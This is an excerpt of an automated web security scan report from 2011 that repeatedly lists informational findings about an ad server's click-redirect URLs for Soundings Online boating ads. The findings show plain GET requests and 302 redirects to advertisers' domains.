http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:05 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.436. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:15:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:02:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.446. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:21 GMT
Server: Apache/2.0.52 (Red Hat)
